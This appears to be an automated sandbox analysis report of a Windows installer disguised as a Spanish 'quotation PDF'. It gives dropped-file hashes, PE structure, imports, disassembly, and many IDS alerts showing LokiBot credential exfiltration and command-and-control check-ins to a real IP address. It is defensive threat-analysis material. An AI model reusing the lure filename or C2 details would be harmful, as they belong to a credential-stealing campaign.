Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U.CU.CU.C...CT.C0..BZ.CU.Cw.C..BT.C..BT.C.QCT.C..BT.CRichU.C........PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..L.................................................... ...............................text............................... ..`.rdata..f.... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\p6r1xk6jk0bjdf9059l3 Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	data
Category:	dropped
Size (bytes):	217882
Entropy (8bit):	7.989727494503245
Encrypted:	false
SSDEEP:	6144:dLBgpumJXJnGuUAN+eNkzPqEUvqhfKuLYq3:xunJXJGbxGEUvAK1q3
MD5:	6D5DAFE120D6D1DD61199A4F38F20619
SHA1:	493D1BD761B2E417FDFF7C1BFC3D68CCAB01460B
SHA-256:	378B7FE283382B7E1F0E67C41C4CAA451B6AB44E546796BA622692224E67C9A9
SHA-512:	F51B719361C96B2D638E35C489ABEA9F752B3B4E1DC432709C3A4687C30FA3A04DE6061FE0A0E097103F9E6D0E918D5EB4B8FD36B7C574131A49C3805740600B
Malicious:	false
Reputation:	low
Preview:	..ul.....E`..."..:...E@.c.........j`s...9Fj.5......q.......!...@.......e&.xh...LQ.k...'.v.1?.9...1......of._6.^@.._..).[.o[h......F..,.N+> ..VI.',.(p[.'.h(..~1._^6..vn;...Qqt...4G.7....R.th.6~....,.y9.>4x.g...(...N...hv.......m.BU.?...Z9%..u..R......7G.....:...m......}....j` ...FjO56......F.......v.@.aF.....gu...3..:....Sh.......9..#....BZd"..s.@.._..)j).........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_S.o....Y...D...L<..%.VC.,...L{w0.a.........B..D...Z9%..u,..O...`..7C.....&.@.....\|....-j`s...9Fj.5......#5.m.....a.@E/F...P.2..........RS.N[.X....9.....BV......s.@.._..)j)........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_7-o....Y...D...L<..%.VC.,...L..hv...B......B......Z9%..u,..O...`..."..:...E@.c.........j`s...9Fj.5......q..........@.aF....Pgu..........RShN*......9..#....BV......s.@.._..)j).........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_7-o....Y...D...L<..%.VC.,...L

C:\Users\user\AppData\Local\Temp\tmdvzsircx Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	data
Category:	dropped
Size (bytes):	4976
Entropy (8bit):	6.161968435503816
Encrypted:	false
SSDEEP:	96:dz0p9Vb7mSf8rAzp/mFJjRaXeHxKzQDwgim9Nv1SC0ip1/zIE449tUUlGT7c571N:dz0pDDD4yeHxK0Dym9/tE8U3Tw571SUT
MD5:	D83B3DB2850820DCF18D511826E05844
SHA1:	8FEF008C0EEA3C1BCFF29446455C9FFF1F79D9A6
SHA-256:	AD07B4AA8FBB3811E21582695F487F4A5A8E4908F28C7A2127698AF298A607AD
SHA-512:	31D4FE9453BAEF8F72070384CB69985C267A5A0B530576EA270A628DDDD69406732FC782ED63868A5AB0F39E7ADFD1C2449FBD3FBFE30B9CBB6056A81B87AAAD
Malicious:	false
Reputation:	low
Preview:	.&..<...Sb96.....6.."l..6.."l......l.K........\..\#.l.c......l..<..\..\#.l.c......l.<..\..\#.l.c......l.<..\..\#.l.c......l.<..#.Y=m+;....l...l.<..l#...B.l..d.l..d....B.m#`...l..<....l.69......mB.......7,.J...\.`.\.].\.X;.\.X`.\.n.\.q..#.k...k.O.3...\..\.X].l+.,.l..........W7.2.....7$..qn.l.nq:..t...<..hh.6.."l.l+...l..3.l+...d#.'.<.W...l..l+..S.d+...l.<...t........[.........'..........._....+..$_z..g....M....+.<...K.6.."l..l.#....l..l........l.....l.S.l..l.k.l....',....i.l+.m+`....W$..g$.l..m+`....W$..g$.m.m+;....W,.c.........c......l....l.c.\+.M....l......).....&.l......l...t...<...S.6.."l..l.K....l.l........l.....l.S.l..l.k.l....r............l+.m+`....W$.g$.l..m+`....W$.g$.l#.m+`...W$.g$.l'B.m+]....W..O..l..m+`....W$.g$.m,m+;....W,.c.........c......l......+.l..d......\..\'.\#.\..\+......l......).....&.l......l...t.'.<.....l.#....l..l........l.....l.S.l..l.k.l....m.....i.l+.m+`....W$..g$..l..m+`....W$..g$.m.m+;....W,.c.$_z..F...c.7....l..!.\

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.863769051552967
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Cotizaci#U00f3npdf.exe
File size:	251901
MD5:	3fe29e21698212a70e03144bb4979632
SHA1:	b400de247096542b778aa7ed7584f6829b5bbf4e
SHA256:	c42005e0a00c3ecbaff6c1189ca8b6f1298a818878ceaebb623585c399c8ba81
SHA512:	a37080b42f317bcaf288acc2ede4fd178bf8227a6f0650b61378e829458fb26808f6fb64250e32bb737f583ddb75264c1fde488e31ceb57d7890005f04ab723d
SSDEEP:	6144:/wCNuC+dh+Q6PTM9599ohs4o358eJr6NxGD:ruN+QMTMVpP80AA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	1c188bca1b2d565b

Static PE Info

General
Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007FE928B0F4F0h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007FE928B0F1A7h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007FE928B0F195h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007FE928B0C9BCh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FE928B0EC88h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FE928B0CA15h
cmp cl, 00000020h
jne 00007FE928B0C9B8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FE928B0C9ACh
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x4148	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x4148	0x4200	False	0.441169507576	data	5.0955746829	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c1f0	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295	English	United States
RT_ICON	0x2e798	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295	English	United States
RT_ICON	0x2f840	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x2fca8	0x100	data	English	United States
RT_DIALOG	0x2fda8	0x11c	data	English	United States
RT_DIALOG	0x2fec8	0x60	data	English	United States
RT_GROUP_ICON	0x2ff28	0x30	data	English	United States
RT_MANIFEST	0x2ff58	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-17:28:13.315745	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49754	80	192.168.2.5	104.223.93.105
01/14/22-17:28:13.315745	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.5	104.223.93.105
01/14/22-17:28:13.315745	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.5	104.223.93.105
01/14/22-17:28:14.966908	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49755	80	192.168.2.5	104.223.93.105
01/14/22-17:28:14.966908	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.5	104.223.93.105
01/14/22-17:28:14.966908	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.5	104.223.93.105
01/14/22-17:28:16.603027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.5	104.223.93.105
01/14/22-17:28:16.603027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.5	104.223.93.105
01/14/22-17:28:16.603027	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.5	104.223.93.105
01/14/22-17:28:18.954071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.5	104.223.93.105
01/14/22-17:28:18.954071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.5	104.223.93.105
01/14/22-17:28:18.954071	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.5	104.223.93.105
01/14/22-17:28:21.450628	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.5	104.223.93.105
01/14/22-17:28:21.450628	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.5	104.223.93.105
01/14/22-17:28:21.450628	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.5	104.223.93.105
01/14/22-17:28:23.258656	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.5	104.223.93.105
01/14/22-17:28:23.258656	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.5	104.223.93.105
01/14/22-17:28:23.258656	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.5	104.223.93.105
01/14/22-17:28:24.754730	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.5	104.223.93.105
01/14/22-17:28:24.754730	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.5	104.223.93.105
01/14/22-17:28:24.754730	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.5	104.223.93.105
01/14/22-17:28:26.095199	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.5	104.223.93.105
01/14/22-17:28:26.095199	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.5	104.223.93.105
01/14/22-17:28:26.095199	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.5	104.223.93.105
01/14/22-17:28:27.825343	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.5	104.223.93.105
01/14/22-17:28:27.825343	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.5	104.223.93.105
01/14/22-17:28:27.825343	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.5	104.223.93.105
01/14/22-17:28:29.267836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.5	104.223.93.105
01/14/22-17:28:29.267836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.5	104.223.93.105
01/14/22-17:28:29.267836	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.5	104.223.93.105
01/14/22-17:28:30.598055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.5	104.223.93.105
01/14/22-17:28:30.598055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.5	104.223.93.105
01/14/22-17:28:30.598055	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.5	104.223.93.105
01/14/22-17:28:31.998392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.5	104.223.93.105
01/14/22-17:28:31.998392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.5	104.223.93.105
01/14/22-17:28:31.998392	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.5	104.223.93.105
01/14/22-17:28:35.257565	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.5	104.223.93.105
01/14/22-17:28:35.257565	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.5	104.223.93.105
01/14/22-17:28:35.257565	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.5	104.223.93.105
01/14/22-17:28:37.734698	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.5	104.223.93.105
01/14/22-17:28:37.734698	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.5	104.223.93.105
01/14/22-17:28:37.734698	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.5	104.223.93.105
01/14/22-17:28:44.091710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.5	104.223.93.105
01/14/22-17:28:44.091710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.5	104.223.93.105
01/14/22-17:28:44.091710	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.5	104.223.93.105
01/14/22-17:28:45.667839	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.5	104.223.93.105
01/14/22-17:28:45.667839	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.5	104.223.93.105
01/14/22-17:28:45.667839	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.5	104.223.93.105
01/14/22-17:28:47.384707	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.5	104.223.93.105
01/14/22-17:28:47.384707	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.5	104.223.93.105
01/14/22-17:28:47.384707	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.5	104.223.93.105
01/14/22-17:28:48.947783	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.5	104.223.93.105
01/14/22-17:28:48.947783	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.5	104.223.93.105
01/14/22-17:28:48.947783	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.5	104.223.93.105
01/14/22-17:28:50.801699	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.5	104.223.93.105
01/14/22-17:28:50.801699	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.5	104.223.93.105
01/14/22-17:28:50.801699	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.5	104.223.93.105
01/14/22-17:28:52.454047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.5	104.223.93.105
01/14/22-17:28:52.454047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.5	104.223.93.105
01/14/22-17:28:52.454047	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.5	104.223.93.105
01/14/22-17:28:54.036242	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.5	104.223.93.105
01/14/22-17:28:54.036242	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.5	104.223.93.105
01/14/22-17:28:54.036242	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.5	104.223.93.105
01/14/22-17:28:55.470161	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.5	104.223.93.105
01/14/22-17:28:55.470161	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.5	104.223.93.105
01/14/22-17:28:55.470161	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.5	104.223.93.105
01/14/22-17:28:57.622553	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.5	104.223.93.105
01/14/22-17:28:57.622553	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.5	104.223.93.105
01/14/22-17:28:57.622553	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.5	104.223.93.105
01/14/22-17:28:59.015617	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.5	104.223.93.105
01/14/22-17:28:59.015617	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.5	104.223.93.105
01/14/22-17:28:59.015617	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.5	104.223.93.105
01/14/22-17:29:00.450387	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.5	104.223.93.105
01/14/22-17:29:00.450387	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.5	104.223.93.105
01/14/22-17:29:00.450387	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.5	104.223.93.105
01/14/22-17:29:01.829359	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.5	104.223.93.105
01/14/22-17:29:01.829359	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.5	104.223.93.105
01/14/22-17:29:01.829359	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.5	104.223.93.105
01/14/22-17:29:03.362296	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.5	104.223.93.105
01/14/22-17:29:03.362296	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.5	104.223.93.105
01/14/22-17:29:03.362296	TCP	2025381	ET TROJAN LokiBot Checkin	49812	80	192.168.2.5	104.223.93.105
01/14/22-17:29:05.461336	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.5	104.223.93.105
01/14/22-17:29:05.461336	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.5	104.223.93.105
01/14/22-17:29:05.461336	TCP	2025381	ET TROJAN LokiBot Checkin	49813	80	192.168.2.5	104.223.93.105
01/14/22-17:29:07.046101	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49814	80	192.168.2.5	104.223.93.105
01/14/22-17:29:07.046101	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49814	80	192.168.2.5	104.223.93.105
01/14/22-17:29:07.046101	TCP	2025381	ET TROJAN LokiBot Checkin	49814	80	192.168.2.5	104.223.93.105
01/14/22-17:29:08.406847	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49815	80	192.168.2.5	104.223.93.105
01/14/22-17:29:08.406847	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49815	80	192.168.2.5	104.223.93.105
01/14/22-17:29:08.406847	TCP	2025381	ET TROJAN LokiBot Checkin	49815	80	192.168.2.5	104.223.93.105
01/14/22-17:29:11.296373	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49818	80	192.168.2.5	104.223.93.105
01/14/22-17:29:11.296373	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49818	80	192.168.2.5	104.223.93.105
01/14/22-17:29:11.296373	TCP	2025381	ET TROJAN LokiBot Checkin	49818	80	192.168.2.5	104.223.93.105
01/14/22-17:29:14.185843	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49819	80	192.168.2.5	104.223.93.105
01/14/22-17:29:14.185843	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49819	80	192.168.2.5	104.223.93.105
01/14/22-17:29:14.185843	TCP	2025381	ET TROJAN LokiBot Checkin	49819	80	192.168.2.5	104.223.93.105
01/14/22-17:29:16.911808	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.5	104.223.93.105
01/14/22-17:29:16.911808	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.5	104.223.93.105
01/14/22-17:29:16.911808	TCP	2025381	ET TROJAN LokiBot Checkin	49820	80	192.168.2.5	104.223.93.105
01/14/22-17:29:18.692195	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49821	80	192.168.2.5	104.223.93.105
01/14/22-17:29:18.692195	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49821	80	192.168.2.5	104.223.93.105
01/14/22-17:29:18.692195	TCP	2025381	ET TROJAN LokiBot Checkin	49821	80	192.168.2.5	104.223.93.105
01/14/22-17:29:23.575058	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49827	80	192.168.2.5	104.223.93.105
01/14/22-17:29:23.575058	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49827	80	192.168.2.5	104.223.93.105
01/14/22-17:29:23.575058	TCP	2025381	ET TROJAN LokiBot Checkin	49827	80	192.168.2.5	104.223.93.105
01/14/22-17:29:25.832127	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.2.5	104.223.93.105
